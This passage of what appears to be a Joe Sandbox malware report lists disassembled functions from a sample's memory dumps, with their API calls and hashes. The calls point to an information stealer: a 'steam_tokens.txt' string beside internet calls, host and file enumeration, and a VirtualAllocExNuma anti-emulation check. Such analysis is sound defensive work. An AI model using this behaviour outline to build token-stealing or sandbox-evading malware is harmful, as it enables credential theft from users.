00A, xrefs: 0041285C, 0041288B, 004128BB, 004128EA, 0041291A, 00412949, 0041296B, 0041285F, 0041288E, 004128BE, 004128ED, 0041291D, 0041294C

Memory Dump Source

Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_u48o.jbxd

Yara matches

Similarity

API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID: 00A
API String ID: 2104210347-95910775
Opcode ID: 0059c6a1cdbce71a941e6102a03021f307d23a853d510470ca8830f04c47ea2b
Instruction ID: 9a839e9be304faf39bc4facc08b08f26c4420ed68fa3aa933a56f5c5bfc0aac5
Opcode Fuzzy Hash: 0059c6a1cdbce71a941e6102a03021f307d23a853d510470ca8830f04c47ea2b
Instruction Fuzzy Hash: 6441ABB7A001047BCB24FBE0DC92EEA377E9B94705F00424DB55987191ED74A7D48BD9

Uniqueness

Uniqueness Score: -1.00%

Function 6C1F3060 Relevance: 4.5, APIs: 3, Instructions: 36timeCOMMON

Download Yara Rule

APIs

?Startup@TimeStamp@mozilla@@SAXXZ.MOZGLUE ref: 6C1F3095

Part of subcall function 6C1F35A0: InitializeCriticalSectionAndSpinCount.KERNEL32(6C27F688,00001000), ref: 6C1F35D5
Part of subcall function 6C1F35A0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C1F35E0
Part of subcall function 6C1F35A0: QueryPerformanceFrequency.KERNEL32(?), ref: 6C1F35FD
Part of subcall function 6C1F35A0: _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C1F363F
Part of subcall function 6C1F35A0: GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C1F369F
Part of subcall function 6C1F35A0: __aulldiv.LIBCMT ref: 6C1F36E4

?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C1F309F

Part of subcall function 6C215B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C2156EE,?,00000001), ref: 6C215B85
Part of subcall function 6C215B50: EnterCriticalSection.KERNEL32(6C27F688,?,?,?,6C2156EE,?,00000001), ref: 6C215B90
Part of subcall function 6C215B50: LeaveCriticalSection.KERNEL32(6C27F688,?,?,?,6C2156EE,?,00000001), ref: 6C215BD8
Part of subcall function 6C215B50: GetTickCount64.KERNEL32 ref: 6C215BE4

?InitializeUptime@mozilla@@YAXXZ.MOZGLUE ref: 6C1F30BE

Part of subcall function 6C1F30F0: QueryUnbiasedInterruptTime.KERNEL32 ref: 6C1F3127
Part of subcall function 6C1F30F0: __aulldiv.LIBCMT ref: 6C1F3140

Part of subcall function 6C22AB2A: __onexit.LIBCMT ref: 6C22AB30

Memory Dump Source

Source File: 0000000A.00000002.1716177431.000000006C1F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 6C1F0000, based on PE: true

Associated: 0000000A.00000002.1716123546.000000006C1F0000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000000A.00000002.1716466376.000000006C26D000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000000A.00000002.1716499748.000000006C27E000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000000A.00000002.1716526775.000000006C282000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c1f0000_u48o.jbxd

Similarity

API ID: Time$CriticalQuerySection$InitializePerformanceStamp@mozilla@@__aulldiv$AdjustmentCountCount64CounterEnterFrequencyInterruptLeaveNow@SpinStartup@SystemTickUnbiasedUptime@mozilla@@V12@___onexit_strnicmpgetenv
String ID:
API String ID: 4291168024-0
Opcode ID: fdfd46ecbb695852b360b0b8a931a6a7677edfbf66e67dc58fb0875b31cf0ae3
Instruction ID: 8ef74fcd89670ee0cf00419ef305b0a8cf5fc0ff5c39d264b41b11c903cc1422
Opcode Fuzzy Hash: fdfd46ecbb695852b360b0b8a931a6a7677edfbf66e67dc58fb0875b31cf0ae3
Instruction Fuzzy Hash: 3CF0F912D2475896CB11EF3488C52E773B0AF6B614F505319EC64635A1FF2062D9C3A2

Uniqueness

Uniqueness Score: -1.00%

Function 00415B70 Relevance: 4.5, APIs: 3, Instructions: 29COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,?), ref: 00415B84
K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00415BA5
CloseHandle.KERNEL32(00000000), ref: 00415BAF

Memory Dump Source

Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_u48o.jbxd

Yara matches

Similarity

API ID: CloseFileHandleModuleNameOpenProcess
String ID:
API String ID: 3183270410-0
Opcode ID: 97fc9d568dab5260ce1fa1a51ba1ebaf2853d767a04b83f08cd6b5726440208b
Instruction ID: b12b055c0fde6327b7bfc42128d307bcca402a5100f46dd347d8d84938e244fe
Opcode Fuzzy Hash: 97fc9d568dab5260ce1fa1a51ba1ebaf2853d767a04b83f08cd6b5726440208b
Instruction Fuzzy Hash: C5F05475A0010CFBDB14DFA4DC4AFED7778BB08300F004499BA0597280D6B06E85CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00414400 Relevance: 4.5, APIs: 3, Instructions: 23memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,004136EB,0041D6E3), ref: 0041440D
HeapAlloc.KERNEL32(00000000), ref: 00414414
GetComputerNameA.KERNEL32(?,00000104), ref: 0041442C

Memory Dump Source

Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_u48o.jbxd

Yara matches

Similarity

API ID: Heap$AllocComputerNameProcess
String ID:
API String ID: 4203777966-0
Opcode ID: 6e220fa814439a9a47cb0e7b1b891ce31241d7c627682025937d03601ca1af04
Instruction ID: 2ac30a00ccf60c4f43266989ac8565747831d88261cb92d9c694311de33eed43
Opcode Fuzzy Hash: 6e220fa814439a9a47cb0e7b1b891ce31241d7c627682025937d03601ca1af04
Instruction Fuzzy Hash: F1E0D8B0A00608FBCB20DFE4DD48BDD77BCAB04305F100055FA05D3240D7749A458B96

Uniqueness

Uniqueness Score: -1.00%

Function 004010D0 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,004136DC), ref: 004010EB
VirtualAllocExNuma.KERNEL32(00000000,?,?,004136DC), ref: 004010F2
ExitProcess.KERNEL32 ref: 00401103

Memory Dump Source

Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_u48o.jbxd

Yara matches

Similarity

API ID: Process$AllocCurrentExitNumaVirtual
String ID:
API String ID: 1103761159-0
Opcode ID: b1c8d233814077f36e701fc9dcba40fcf29c53b912e4e1fc8df77dce1fb5e496
Instruction ID: b86936f0f7b92ad6105a5e8d9325c57b614f4cde8fc05540e07f2d0ff83aec39
Opcode Fuzzy Hash: b1c8d233814077f36e701fc9dcba40fcf29c53b912e4e1fc8df77dce1fb5e496
Instruction Fuzzy Hash: 1BE0867098570CBBE7309BA0DD0AB1976689B08B06F101055F7097A1D0C6B425008699

Uniqueness

Uniqueness Score: -1.00%

Function 004119B0 Relevance: 3.1, APIs: 2, Instructions: 66stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 004119C8

Part of subcall function 00411650: wsprintfA.USER32 ref: 00411669
Part of subcall function 00411650: FindFirstFileA.KERNEL32(?,?), ref: 00411680

strtok_s.MSVCRT ref: 00411A4D

Memory Dump Source

Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_u48o.jbxd

Yara matches

Similarity

API ID: strtok_s$FileFindFirstwsprintf
String ID:
API String ID: 3409980764-0
Opcode ID: 975833a798ef07385fb740c26f6e35f7306421425023d288693ea324a83a39c3
Instruction ID: 5fc3070f54b5ba386e916c7c3ae22cc6ad81f817c7a7f871d2ab45b9afc63085
Opcode Fuzzy Hash: 975833a798ef07385fb740c26f6e35f7306421425023d288693ea324a83a39c3
Instruction Fuzzy Hash: 19215471900108EBCB14FFA5CC55FED7B79AF44345F10805AF51A97151EB386B84CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00412B30 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 40stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,04082BB0,?,0041D8AC,?,00000000), ref: 00416E2B
Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85

lstrlen.KERNEL32(00000000,00000000,0041D599,?,?,?,?,?,?,00412FF8,?), ref: 00412B5A

Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,04083B38), ref: 00404ED9

Strings

steam_tokens.txt, xrefs: 00412B6F

Memory Dump Source

Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_u48o.jbxd

Yara matches

Similarity

API ID: lstrlen$lstrcpy$InternetOpen
String ID: steam_tokens.txt
API String ID: 2934705399-401951677
Opcode ID: 0e3b4742804874a780a066254cb668122dfdc385ba13d8aa658f83288e45540c
Instruction ID: 10dd2298c38adeb5e36390c5bfe4eda46295fd03d88468a146a299c80adb3810
Opcode Fuzzy Hash: 0e3b4742804874a780a066254cb668122dfdc385ba13d8aa658f83288e45540c
Instruction Fuzzy Hash: 18F08175D1020866CB18FBB2EC539ED773D9E54348B00425EF81662491EF38A788C6E9

Uniqueness

Uniqueness Score: -1.00%

Function 004147C0 Relevance: 3.0, APIs: 2, Instructions: 17COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(00000000), ref: 004147CD
wsprintfA.USER32 ref: 004147E3

Memory Dump Source

Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_u48o.jbxd

Yara matches

Similarity

API ID: InfoSystemwsprintf
String ID:
API String ID: 2452939696-0
Opcode ID: ae5762f0629c30c52eb39fe9d29b6f6254fbc8fd6ef0ba27fd947bac7523c98c
Instruction ID: d87a4f6b3ea3f44bdf221dc5e2fa01f01132d118a4d77551e5f155a4815ada85
Opcode Fuzzy Hash: ae5762f0629c30c52eb39fe9d29b6f6254fbc8fd6ef0ba27fd947bac7523c98c
Instruction Fuzzy Hash: FAD012B580020C5BD720DBD0ED49AE9B77DBB44204F4049A5EE1492140EBB96AD58AA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040ACE0 Relevance: 2.9, APIs: 2, Instructions: 387stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 004097F0: memcmp.MSVCRT ref: 0040980B
Part of subcall function 004097F0: memset.MSVCRT ref: 0040983E
Part of subcall function 004097F0: LocalAlloc.KERNEL32(00000040,?), ref: 0040988E

lstrlen.KERNEL32(00000000), ref: 0040B190
lstrlen.KERNEL32(00000000), ref: 0040B1A4

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,04083B38), ref: 00404ED9

Memory Dump Source

Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_u48o.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat$AllocInternetLocalOpenmemcmpmemset
String ID:
API String ID: 574041509-0
Opcode ID: a6a78ff70d27b61a9f6037f1a30da5da91f984a2f7bb54771162fbb6bc8815ef
Instruction ID: df99340f366afcb3d937a345db0e295b6fae9bf0b5ece921659d29683b3ff0c0
Opcode Fuzzy Hash: a6a78ff70d27b61a9f6037f1a30da5da91f984a2f7bb54771162fbb6bc8815ef
Instruction Fuzzy Hash: 6CE114769101189BCF15EBA1DC92EEE773DBF54308F41415EF10676091EF38AA89CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040A6E0 Relevance: 2.7, APIs: 2, Instructions: 236stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

lstrlen.KERNEL32(00000000), ref: 0040A95A
lstrlen.KERNEL32(00000000), ref: 0040A96E

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,04083B38), ref: 00404ED9

Memory Dump Source

Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_u48o.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat$InternetOpen
String ID:
API String ID: 3635112192-0
Opcode ID: 7cd8234a4abdb81a99944f9f6d451a59de705a0f1975fd9f1c7cd260678ca252
Instruction ID: 9f23dc4c71334aa449457ef7a0e8bbad4682aa92b3b7ddf60c673b4dae8ee631
Opcode Fuzzy Hash: 7cd8234a4abdb81a99944f9f6d451a59de705a0f1975fd9f1c7cd260678ca252
Instruction Fuzzy Hash: FC9149729102049BCF14FBA1DC51EEE773DBF54308F41425EF50666091EF38AA89CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040AA20 Relevance: 2.7, APIs: 2, Instructions: 205stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

lstrlen.KERNEL32(00000000), ref: 0040AC1E
lstrlen.KERNEL32(00000000), ref: 0040AC32

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,04083B38), ref: 00404ED9

Memory Dump Source

Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_u48o.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat$InternetOpen
String ID:
API String ID: 3635112192-0
Opcode ID: 5dd6e1886fe9a9aadc567094d83ba0008eab3b8b6066a721d99fb8c77c53bff9
Instruction ID: 57c8c1270dba92ae3db9aa8e51dd660502e79bf125d10b7c0566732e7217b02b
Opcode Fuzzy Hash: 5dd6e1886fe9a9aadc567094d83ba0008eab3b8b6066a721d99fb8c77c53bff9
Instruction Fuzzy Hash: C07153759102049BCF14FBA1DC52DEE7739BF54308F41422EF506A7191EF38AA89CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 004114C0 Relevance: 2.6, APIs: 2, Instructions: 100COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00411550

Memory Dump Source

Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_u48o.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide
String ID:
API String ID: 626452242-0
Opcode ID: 46fcbcde96b391d8a91c7de27c3ae99c7866997ac8e62baa93d065818f15697d
Instruction ID: 8f9af232e05b2939ec69b712380268a2006cbed21c6953bc19412128f28bf8b7
Opcode Fuzzy Hash: 46fcbcde96b391d8a91c7de27c3ae99c7866997ac8e62baa93d065818f15697d
Instruction Fuzzy Hash: 0641F770A00A289FDB24DB58CC95BDBB7B5BB48702F4091C9A618A72E0D7716EC6CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00406050 Relevance: 2.6, APIs: 2, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(004067AE,004067AE,00003000,00000040), ref: 004060F6
VirtualAlloc.KERNEL32(00000000,004067AE,00003000,00000040), ref: 00406143

Memory Dump Source

Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_u48o.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: a813d0be407c7e97fb4ae0c443796924326960eff0d044c67b11f739482c465e
Instruction ID: 5341a9e810d76a35e886a0404415562c2a616bd51e9685e0b668c9c894d7d0dc
Opcode Fuzzy Hash: a813d0be407c7e97fb4ae0c443796924326960eff0d044c67b11f739482c465e
Instruction Fuzzy Hash: 8341DE34A00209EFCB54CF58C494BADBBB1FF44314F1482A9E95AAB395C735AA91CB84

Uniqueness

Uniqueness Score: -1.00%

Function 00412A80 Relevance: 2.5, APIs: 2, Instructions: 48stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B

lstrcat.KERNEL32(?,00000000), ref: 00412ABA
lstrcat.KERNEL32(?,04086868), ref: 00412AD8

Part of subcall function 00412570: wsprintfA.USER32 ref: 00412589
Part of subcall function 00412570: FindFirstFileA.KERNELBASE(?,?), ref: 004125A0

Memory Dump Source

Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_u48o.jbxd

Yara matches

Similarity

API ID: lstrcat$FileFindFirstFolderPathwsprintf
String ID:
API String ID: 2699682494-0
Opcode ID: ea1ffac3ae604c61d94c3ab08edcb0d871ee1865e913378f7efedfa2106ffca1
Instruction ID: bcc253f25bf78e1a0e90404f031f6467c50b05fa57c941630bc3dd144581bb5c
Opcode Fuzzy Hash: ea1ffac3ae604c61d94c3ab08edcb0d871ee1865e913378f7efedfa2106ffca1
Instruction Fuzzy Hash: 8701B97A900608B7CB24FBB0DC47EDA773D9B54705F404189B64956091EE78AAC4CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 00401060 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004,?,?,?,0040110E,?,?,004136DC), ref: 00401073
VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0,?,?,?,0040110E,?,?,004136DC), ref: 004010B7

Memory Dump Source

Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_u48o.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 1fafdb83e91c72df66fc5e0dfbe5cc959ff82812f546fe48c521c8e5e261a801
Instruction ID: a2913bed729a6fe358320823385779fc3d8f71f1cc7b0a13f7ab4b92dd49de4a
Opcode Fuzzy Hash: 1fafdb83e91c72df66fc5e0dfbe5cc959ff82812f546fe48c521c8e5e261a801
Instruction Fuzzy Hash: 42F027B1641208BBE724DAF4AC59FAFF79CA745B05F304559F980E3390DA719F00CAA4

Uniqueness

Uniqueness Score: -1.00%

Function 00415490 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,?,0040E9F4,?,00000000,?,00000000,0041D76E,0041D76B), ref: 0041549F

Memory Dump Source

Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_u48o.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: d0ebe2fb72674ebe02027a203c9a5e23a0550e75489eb08aacc5631cf77d8e9a
Instruction ID: 7a99a0210fb0b6ed6de77f6d22eec219e0a4aedfc9bcf57955c7481c69c901e8
Opcode Fuzzy Hash: d0ebe2fb72674ebe02027a203c9a5e23a0550e75489eb08aacc5631cf77d8e9a
Instruction Fuzzy Hash: 9BF01C70C00608EBCB10EF94C9457DDBB74AF44315F10829AD82957380DB395A85CB89

Uniqueness

Uniqueness Score: -1.00%

